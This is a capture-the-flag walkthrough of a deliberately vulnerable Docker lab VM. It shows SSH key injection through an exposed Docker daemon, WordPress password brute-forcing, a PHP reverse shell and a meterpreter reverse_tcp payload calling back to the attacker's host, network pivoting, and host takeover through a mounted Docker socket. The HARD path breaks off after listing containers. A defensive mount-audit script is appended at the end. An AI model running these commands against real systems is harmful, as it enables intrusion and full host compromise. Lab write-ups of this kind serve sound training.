Docker notsosecure.com - danielcastropalomares/security GitHub Wiki

Ever fantasized about playing with docker misconfigurations, privilege escalation, etc. within a container?

Download this VM, pull out your pentest hats and get started 🙂

We have 2 Modes:

HARD: This would require you to combine your docker skills as well as your pen-testing skills to achieve host compromise.

EASY: Relatively easier path, knowing docker would be enough to compromise the machine and gain root on the host machine.

We have planted 3 flag files across the various machines / systems that are available to you. Your mission, should you choose to accept it, is as follows:

  1. Identify all the flags (2 in total: flag_1 and flag_3) (flag_2 was inadvertently left out)

  2. Gain id=0 shell access on the host machine.

EASY

With a first scan we see that port 2375 is open, which is the Docker daemon:

root@kali:~# nmap -p- 172.31.255.115
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-04-05 12:19 CEST                                                                                        
Nmap scan report for 172.31.255.115    
Host is up (0.000098s latency).        
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
2375/tcp open  docker
8000/tcp open  http-alt
MAC Address: 08:00:27:D9:C7:82 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.88 seconds
root@kali:~# 

On the web side it is listening on port 8000 and it appears to be a WordPress site:

root@kali:~# nmap -A 172.31.255.115
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-04-05 12:19 CEST
Nmap scan report for 172.31.255.115
Host is up (0.00042s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.8.1
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: NotSoEasy Docker – Just another WordPress site
|_http-trane-info: Problem with XML parsing of /evox/about
MAC Address: 08:00:27:D9:C7:82 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 172.31.255.115

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.86 seconds

We list the running containers:

docker -H=172.31.255.115:2375 ps

We connect to the WordPress container:

docker -H=172.31.255.115:2375 exec -it content_wordpress_1 /bin/bash 
root@8f4bca8ef241:/var/www/html# 

We obtain the database credentials:

/** The name of the database for WordPress */ 
define('DB_NAME', 'wordpress'); 

/** MySQL database username */ 
define('DB_USER', 'wordpress'); 

/** MySQL database password */ 
define('DB_PASSWORD', 'WordPressISBest'); 

/** MySQL hostname */ 
define('DB_HOST', 'db:3306'); 

We do not find any flag inside the WordPress container:

root@8f4bca8ef241:~# find / -name flag* | grep -v sys

We connect to the database container:

docker -H=172.31.255.115:2375 exec -it content_db_1 /bin/bash 
mysql -u wordpress -p wordpress 
mysql> select * from wp_users; 
+----+------------+------------------------------------+---------------+----------------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email                 | user_url | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+----------------------------+----------+---------------------+---------------------+-------------+--------------+
|  1 | bob        | $P$B0VtNkHE4cR4TTnEMypX1XyR3tu3z1. | bob           | [email protected] |          | 2017-08-19 04:35:41 |                     |           0 | bob          |
+----+------------+------------------------------------+---------------+----------------------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.00 sec)

We create a new container and map the host's root directory (/root) into the container:

docker -H=172.31.255.115:2375 run -itd -v /root:/root alpine /bin/sh

In the .ssh directory:

~ # cat /root/.ssh/authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpT+U/LoYIzigCo5HFQR1vzSCXwQciu/pGPDpfj46v4aP6GYwel2jGn0waWViSzVk99CXVXneO0akbwLIyrrXluAcvng6f5vjRWPM46DGibV06ypAI6Y0neRC+oSF2b4D1mizcSlbGqJYNr00YcKETDNr8QFQt0eFS8KmwovtP5pkg3GiotOIbWEFOeQ8V6N/ShNl5wuRuMosESlP+RpzgawSE7KcoTzAJ6LqmUR4wWeW1XfLMaGD6Z4QIkofNyghlQ/SsNDYweSuztM2kqdtVDsEPNCiLgVCQsAWaBiL6sTSWf2ywJtiRocOg6BHy8IymljltOjyQf8g+ky2CLaGx [email protected]

We add our SSH key:

root@kali:~# cat test2.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVJZeFL8s25vndmwu3tahDcRXLuRm3DCpSER0x10bK3SIa53CZ319n2h/vKOBHvELdTvxyWf4VOQUUydkF7SJSHzvMaT94TBMqcM2noOfe0DZiU6QefyQr22Nvop+AOaNd/EXjqBwIjMUQoNWPpPygJ3Vq3xzcU9+QSg1FexYrEo5gmDYMbH0zgaZlAWhHSdYhSWVGCjrc7s5tfESqtqwXb4K96Xb4lK2SfmVnWot0zOrndjE4ckUYcoWMogB22KCKltsBiwscpSy6dpOEJOFsDF1urWerUV4N0uU3POtNI7DE1m+aAp/FIMsd9du3puvS2adcBCBeh9FGDn3IYUmT root@kali

~/.ssh # echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVJZeFL8s25vndmwu3tahDcRXLuRm3DCpSER0x10bK3SIa53CZ319n2h/vKOBHvELdTvxyWf4VOQUUydkF7SJSHzvMaT94TBMqcM2noOfe0DZiU6QefyQr22Nvop+AOaNd/EXjqBwIjMUQoNWPpPygJ3Vq3xzcU9+QSg1FexYrEo5gmDYMbH0zgaZlAWhHSdYhSWVGCjrc7s5tfESqtqwXb4K96Xb4lK2SfmVnWot0zOrndjE4ckUYcoWMogB22KCKltsBiwscpSy6dpOEJOFsDF1urWerUV4N0uU3POtNI7DE1m+aAp/FIMsd9du3puvS2adcBCBeh9FGDn3IYUmT root@kali" >> authorized_keys

We connect over SSH:

root@kali:~# ssh -i test2 root@172.31.255.115
The authenticity of host '172.31.255.115 (172.31.255.115)' can't be established.
ECDSA key fingerprint is SHA256:iMM5I1uQqleM9fe/JBCQcZp73GOjgDxxR/EB4Gwf1QI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.31.255.115' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Fri Apr  5 11:16:29 BST 2019

  System load: 0.0               Memory usage: 5%   Processes:       74
  Usage of /:  25.3% of 8.73GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Tue Aug 22 15:17:15 2017 from 192.168.0.101
root@vulndocker:~# 

We look for the flag:

root@vulndocker:~# find / -name flag* | grep -v sys 
/usr/src/linux-headers-3.13.0-128-generic/include/config/zone/dma/flag.h 
/usr/src/linux-headers-3.13.0-128/scripts/coccinelle/locks/flags.cocci 
/flag_3

root@vulndocker:~# cat /flag_3
d867a73c70770e73b65e6949dd074285dfdee80a8db333a7528390f6

Awesome so you reached host

Well done

Now the bigger challenge try to understand and fix the bugs.

If you want more attack targets look at the shadow file and try cracking passwords :P

Thanks for playing the challenges we hope you enjoyed all levels

You can send your suggestions bricks bats criticism or appreciations 
on [email protected] 
root@vulndocker:~# 

HARD

The Docker port is no longer open:

root@kali:~# nmap -p- 172.31.255.115
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-04-05 14:09 CEST
Nmap scan report for 172.31.255.115
Host is up (0.00012s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
8000/tcp open  http-alt
MAC Address: 08:00:27:D9:C7:82 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.52 seconds

root@kali:~# nmap -A 172.31.255.115
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-04-05 14:09 CEST
Nmap scan report for 172.31.255.115
Host is up (0.00057s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.8.9
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: NotSoEasy Docker – Just another WordPress site
|_http-trane-info: Problem with XML parsing of /evox/about
MAC Address: 08:00:27:D9:C7:82 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.57 ms 172.31.255.115

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds

Nikto finds nothing of interest:

root@kali:~# nikto -C all --host 172.31.255.115:8000
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.31.255.115
+ Target Hostname:    172.31.255.115
+ Target Port:        8000
+ Start Time:         2019-04-05 14:10:19 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Retrieved x-powered-by header: PHP/5.6.31
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://172.31.255.115/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/wp-admin/admin-ajax.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.

With wpscan we find the user bob:

root@kali:~# wpscan --url http://172.31.255.115:8000  --force -e u,p                                                  
_______________________________________________________________
	__          _______   _____
	\ \        / /  __ \ / ____|
	 \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
	  \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
	   \  /\  /  | |     ____) | (__| (_| | | | |
	    \/  \/   |_|    |_____/ \___|\__,_|_| |_|

	WordPress Security Scanner by the WPScan Team
	               Version 3.4.0
	  Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://172.31.255.115:8000/
[+] Started: Fri Apr  5 14:14:11 2019

Interesting Finding(s):

[+] http://172.31.255.115:8000/
 | Interesting Entries:
 |  - Server: Apache/2.4.10 (Debian)
 |  - X-Powered-By: PHP/5.6.31
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://172.31.255.115:8000/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] http://172.31.255.115:8000/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://172.31.255.115:8000/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 4.8.9 identified (Latest, released on 2019-03-13).
 | Detected By: Rss Generator (Passive Detection)
 |  - http://172.31.255.115:8000/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>
 |  - http://172.31.255.115:8000/comments/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://172.31.255.115:8000/wp-content/themes/twentyseventeen/
 | Last Updated: 2019-02-21T00:00:00.000Z
 | Readme: http://172.31.255.115:8000/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://172.31.255.115:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.9
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Detected By: Css Style (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Detected By: Style (Passive Detection)
 |  - http://172.31.255.115:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.9, Match: 'Version: 1.3'

[+] Enumerating Most Popular Plugins

[i] No plugins Found.

[+] Enumerating Users
 Brute Forcing Author IDs - Time: 00:00:00 <=============================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] bob
 | Detected By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://172.31.255.115:8000/wp-json/wp/v2/users/
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] 
 | Detected By: Rss Generator (Passive Detection)
 | Confirmed By: Rss Generator (Aggressive Detection)

[+] Finished: Fri Apr  5 14:14:15 2019
[+] Requests Done: 58
[+] Cached Requests: 16
[+] Data Sent: 11.673 KB
[+] Data Received: 2.254 MB
[+] Memory used: 87.512 MB
[+] Elapsed time: 00:00:04

We launch a brute-force attack with the user bob found earlier; after 25 minutes we find a password:

root@kali:~# wpscan --url http://172.31.255.115:8000 -U /tmp/users.txt -P /usr/share/wordlists/rockyou.txt

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - bob / Welcome1             
Trying bob / Welcome1 Time: 00:25:40 <=============================================================================> (40400 / 40400) 100.00% Time: 00:25:40

We are going to upload a reverse shell:

cd /tmp
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
tar -xvzf php-reverse-shell-1.0.tar.gz
cd php-reverse-shell-1.0

We edit the PHP file and set our IP and port:

$ip = '172.31.255.129';  // CHANGE THIS
$port = 8085;       // CHANGE THIS

We start a netcat listener:

root@kali:/usr/local/src/Osmedeus# nc -vlp 8085
listening on [any] 8085 ...

Now, from the WordPress admin interface, we edit the 404.php file and paste in the shell from above:

Appearance > Editor > 404 template.php

Now we access the URL:

http://172.31.255.115:8000/wp-content/themes/twentyseventeen/404.php

And the shell appears in netcat:

root@kali:/usr/local/src/Osmedeus# nc -vlp 8085
listening on [any] 8085 ...



172.31.255.115: inverse host lookup failed: Unknown host
connect to [172.31.255.129] from (UNKNOWN) [172.31.255.115] 40026
Linux 8f4bca8ef241 3.13.0-128-generic #177-Ubuntu SMP Tue Aug 8 11:40:23 UTC 2017 x86_64 GNU/Linux
 13:28:36 up  1:20,  0 users,  load average: 0.00, 2.54, 13.38
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ $ $ $ 
$ 
$ 
$ 

We are now connected inside the Docker container:

$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.5 315068  5252 ?        Ss   12:08   0:00 apache2 -DFOREGROUND
www-data   207  0.9  3.7 398472 37736 ?        S    12:59   0:20 apache2 -DFOREGROUND
www-data   217  0.9  2.4 320680 24876 ?        S    12:59   0:19 apache2 -DFOREGROUND
www-data   218  0.9  2.4 321180 25228 ?        S    13:00   0:19 apache2 -DFOREGROUND
www-data   225  0.7  2.5 320676 25968 ?        S    13:03   0:14 apache2 -DFOREGROUND
www-data   234  0.6  2.4 320672 24712 ?        S    13:05   0:10 apache2 -DFOREGROUND
www-data   245  0.6  3.5 397484 35748 ?        S    13:05   0:11 apache2 -DFOREGROUND
www-data   268  0.6  2.4 320668 24812 ?        S    13:05   0:10 apache2 -DFOREGROUND
www-data   316  0.6  2.4 320700 24772 ?        S    13:05   0:10 apache2 -DFOREGROUND
www-data   331  0.5  2.5 321268 25692 ?        S    13:10   0:07 apache2 -DFOREGROUND
www-data   339  0.0  1.9 318060 19992 ?        S    13:22   0:00 apache2 -DFOREGROUND
www-data   341  0.0  0.0   4328   656 ?        S    13:28   0:00 sh -c uname -a; w; id; /bin/sh -i
www-data   345  0.0  0.0   4328   660 ?        S    13:28   0:00 /bin/sh -i
www-data   351  0.0  0.1  17492  1156 ?        R    13:35   0:00 ps aux
$ 

We obtain the database access credentials:

define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'wordpress');

/** MySQL database password */
define('DB_PASSWORD', 'WordPressISBest');

/** MySQL hostname */
define('DB_HOST', 'db:3306');

SUID binaries:

$ find / -perm -u=s -type f 2>/dev/null

/usr/bin/chsh
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chfn
/bin/umount
/bin/mount
/bin/ping
/bin/ping6
/bin/su

Listening ports:

$ ss -4nlt
State      Recv-Q Send-Q        Local Address:Port          Peer Address:Port 
LISTEN     0      128              127.0.0.11:36198                    *:*     
LISTEN     0      128                       *:80                       *:*     

In cron we find nothing:

$ ls -liath /etc/cron*
total 36K
 14 drwxr-xr-x 70 root root 4.0K Aug 22  2017 ..
329 drwxr-xr-x  2 root root 4.0K Aug  3  2017 .
562 -rwxr-xr-x  1 root root  625 Jul 18  2017 apache2
563 -rwxr-xr-x  1 root root  249 May 17  2017 passwd
564 -rwxr-xr-x  1 root root  15K Dec 11  2016 apt
565 -rwxr-xr-x  1 root root 1.6K May  2  2016 dpkg

The kernel appears to be vulnerable:

$ uname -a
Linux 8f4bca8ef241 3.13.0-128-generic #177-Ubuntu SMP Tue Aug 8 11:40:23 UTC 2017 x86_64 GNU/Linux

We create a payload:

msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf   --platform linux -e generic/none LHOST=172.31.255.129 LPORT=5555   > '/tmp/payload-5555.elf'

We start a Metasploit listener:

msf exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp
msf exploit(multi/handler) > set LHOST 172.31.255.129
msf exploit(multi/handler) > set LPORT 5555
exploit

We run it on the remote machine and see the new session appear:

$ ./payload-5555.elf

Kali:

[*] Meterpreter session 4 opened (172.31.255.129:5555 -> 172.31.255.115:51015) at 2019-04-09 17:36:53 +0200

We send it to the background:

meterpreter > background
[*] Backgrounding session 2...

We route traffic through session 2:

msf exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                    Connection
  --  ----  ----                   -----------                                    ----------
  2         meterpreter x64/linux  uid=33, gid=33, euid=33, egid=33 @ 172.18.0.3  172.31.255.129:5555 -> 172.31.255.115:42798 (172.18.0.3)

msf exploit(multi/handler) > 
msf exploit(multi/handler) >           
msf exploit(multi/handler) > use post/multi/manage/autoroute                                                                                               
msf post(multi/manage/autoroute) > set session 2
session => 2                           
msf post(multi/manage/autoroute) > exploit                                                                                                                 
	                               
[!] SESSION may not be compatible with this module.                                                                                                        
[*] Running module against 172.18.0.3  
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.18.0.0/255.255.0.0 from host's routing table.                                                                                
[*] Post module execution completed    

We run a ping sweep to find more machines:

msf post(multi/manage/autoroute) >  use post/multi/gather/ping_sweep
msf post(multi/gather/ping_sweep) > set rhosts 172.18.0.0-255
rhosts => 172.18.0.0-255
msf post(multi/gather/ping_sweep) > set session 2
session => 2
msf post(multi/gather/ping_sweep) > exploit

[*] Performing ping sweep for IP range 172.18.0.0-255
[+]     172.18.0.3 host found
[+]     172.18.0.2 host found
[+]     172.18.0.1 host found
[+]     172.18.0.4 host found

We scan with portscan:

msf post(multi/gather/ping_sweep) > use auxiliary/scanner/portscan/tcp
msf auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.0-4
rhosts => 172.18.0.0-4
msf auxiliary(scanner/portscan/tcp) > set threads 10
threads => 10
msf auxiliary(scanner/portscan/tcp) > exploit

[+] 172.18.0.1:           - 172.18.0.1:22 - TCP OPEN
[+] 172.18.0.4:           - 172.18.0.4:22 - TCP OPEN
[+] 172.18.0.3:           - 172.18.0.3:80 - TCP OPEN
[+] 172.18.0.2:           - 172.18.0.2:3306 - TCP OPEN
[+] 172.18.0.3:           - 172.18.0.3:5555 - TCP OPEN
[*] Scanned 5 of 5 hosts (100% complete)
[*] Auxiliary module execution completed

If we widen the port range, we see that machine .4 also has port 8022 open:

msf auxiliary(scanner/portscan/tcp) > set PORTS 1-32000
PORTS => 1-32000
msf auxiliary(scanner/portscan/tcp) > exploit

[+] 172.18.0.4:           - 172.18.0.4:22 - TCP OPEN
[+] 172.18.0.4:           - 172.18.0.4:8022 - TCP OPEN

We create a port forward so we can reach port 8022:

sessions 2
portfwd add -l 8022 -p 8022 -r 172.18.0.4
background

And now, if we run nmap against that port, we see it is a web server:

root@kali:/tmp# nmap -A -p 8022 localhost
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-04-09 18:01 CEST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000097s latency).

PORT     STATE SERVICE VERSION
8022/tcp open  http    Node.js Express framework
|_http-title: Docker-SSH
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.7 - 3.10
Network Distance: 0 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.79 seconds

If we connect through the web interface, a shell appears:

Connection established                                                             
	                                                                                             
 ###############################################################                                            
 ## Docker SSH ~ Because every container should be accessible ## 
 ###############################################################                                          
 ## container | content_db_1 ##
 ###############################################################                                             
/ $            

That shell runs as root:

/ $ id                                                                                                                   
uid=0(root) gid=0(root) groups=0(root)

If we review the container's environment variables we find the root credentials for the database:

/ $ export                                                                                           
declare -x GOSU_VERSION="1.7"                                                                        
declare -x HOME="/root"                                                                              
declare -x HOSTNAME="13f0a3bb2706"                                                                   
declare -x MYSQL_DATABASE="wordpress"                                                                
declare -x MYSQL_MAJOR="5.7"                                                                         
declare -x MYSQL_PASSWORD="WordPressISBest"                                                          
declare -x MYSQL_ROOT_PASSWORD="Peaches123"                                                          
declare -x MYSQL_USER="wordpress"                                                                    
declare -x MYSQL_VERSION="5.7.19-1debian8"                                                           
declare -x OLDPWD                                                                                    
declare -x PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"                       
declare -x PS1="\\w \$ "                                                                             
declare -x PWD="/"                                                                                   
declare -x SHLVL="1"                                                                                 
declare -x TERM="linux"                                                                              
declare -x affinity:container                                                                        

In the process list there is a MySQL server listening:

ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
mysql        1  0.0 20.1 1131604 204628 ?      Ssl  19:49   0:05 mysqld

We connected to IP .4 on port 8022, but once inside the shell we see that we are on IP .2, which is the database container:

/ $ ip ad                                                                                            
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default                    
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00                                            
    inet 127.0.0.1/8 scope host lo                                                                   
       valid_lft forever preferred_lft forever                                                       
5: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default             
    link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff                                               
    inet 172.18.0.2/16 scope global eth0                                                             
       valid_lft forever preferred_lft forever                                                       

In the docker-ssh documentation we see that, to start the container, it maps docker.sock into it:

https://hub.docker.com/r/jeroenpeeters/docker-ssh/
$ docker run -d -p 2222:22 \
  -v /var/run/docker.sock:/var/run/docker.sock \
  -e FILTERS={\"name\":[\"^/my-container$\"]} -e AUTH_MECHANISM=noAuth \
  jeroenpeeters/docker-ssh

So, from the SSH console we have open on port 8022, we are going to install docker-ce:

echo "deb https://download.docker.com/linux/debian jessie stable" >> /etc/apt/sources.list
apt-get install apt-transport-https
apt-get update
apt-get install docker-ce

Now docker-ce uses the /var/run/docker.sock socket that is mapped from the host into the docker-ssh container, so we have full control of the host's Docker daemon:

/ $ docker ps                                                                                        
CONTAINER ID        IMAGE                      COMMAND                  CREATED             STATUS              PORTS                  NAMES   
8f4bca8ef241        wordpress:latest           "docker-entrypoint.s…"   19 months ago       Up 8 hours          0.0.0.0:8000->80/tcp   content_wordpress_1 
13f0a3bb2706        mysql:5.7                  "docker-entrypoint.s…"   19 months ago       Up 8 hours          3306/tcp               content_db_1 
b90babce1037        jeroenpeeters/docker-ssh   "npm start"              20 months ago       Up 8 hours          22/tcp, 8022/tcp       content_ssh_1
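Both paths in this write-up end the same way: a host path handed to a container (the `-v /root:/root` one-off in the EASY path, and `/var/run/docker.sock` mounted into `content_ssh_1` here). The following audit script is an added defensive example, not part of the original write-up or the challenge VM: it reads `docker inspect` JSON and flags sensitive host bind mounts and `--privileged` containers. The container records inside it are constructed to mirror the containers seen on this page; the field names follow real `docker inspect` output.

```python
"""Audit `docker inspect` JSON for container-to-host escape risks.

Flags the misconfigurations this walkthrough abuses: a host directory such
as /root bind-mounted into a container, /var/run/docker.sock mounted into a
container, and --privileged.  Field names follow real `docker inspect`
output (Name, Mounts[].Type/Source/Destination, HostConfig.Privileged).
The container records below are constructed to mirror the ones on the page.
"""
import json
import sys
from pathlib import PurePosixPath

# Host paths whose exposure hands a container root-equivalent control of
# the host.  Order matters: the first matching entry supplies the reason.
SENSITIVE_HOST_PATHS = {
    "/": "host root filesystem mounted",
    "/var/run/docker.sock": "Docker socket mounted: full control of the daemon",
    "/root": "host /root mounted: root's authorized_keys can be rewritten",
    "/etc": "host /etc mounted: passwd, shadow and sudoers reachable",
}


def sensitive_reason(host_path):
    """Return why a bind-mount source is dangerous, or None if it is not.

    Mounting a parent directory (e.g. /var/run) exposes everything under it,
    so ancestors of a sensitive path are flagged as well.
    """
    src = PurePosixPath(host_path)
    for sensitive, reason in SENSITIVE_HOST_PATHS.items():
        target = PurePosixPath(sensitive)
        if src == target or src in target.parents:
            return reason
    return None


def audit(containers):
    """Return (container_name, finding) pairs for a list of inspect records."""
    findings = []
    for c in containers:
        name = c["Name"].lstrip("/")
        if c.get("HostConfig", {}).get("Privileged"):
            findings.append((name, "--privileged: all capabilities and raw device access"))
        for m in c.get("Mounts", []):
            if m.get("Type") != "bind":  # named volumes live under /var/lib/docker
                continue
            reason = sensitive_reason(m["Source"])
            if reason:
                findings.append((name, f"{m['Source']} -> {m['Destination']}: {reason}"))
    return findings


def audit_json(text):
    """Parse the JSON array that `docker inspect <ids...>` prints and audit it."""
    return audit(json.loads(text))


# Constructed sample: the three compose containers plus the one-off alpine
# container from the EASY path.  Only the fields the audit reads are filled in.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/content_wordpress_1", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/content_wp/_data",
                 "Destination": "/var/www/html"}]},
    {"Name": "/content_db_1", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/content_db/_data",
                 "Destination": "/var/lib/mysql"}]},
    {"Name": "/content_ssh_1", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                 "Destination": "/var/run/docker.sock"}]},
    {"Name": "/alpine_escape", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/root", "Destination": "/root"}]},
])


if __name__ == "__main__":
    # Real use: docker inspect $(docker ps -q) > inspect.json; python3 audit.py inspect.json
    # Without an argument the constructed sample above is audited instead.
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_INSPECT
    for name, finding in audit_json(data):
        print(f"[!] {name}: {finding}")
```

On the sample it reports `content_ssh_1` for the socket mount and `alpine_escape` for /root, and nothing for the two containers that only use named volumes.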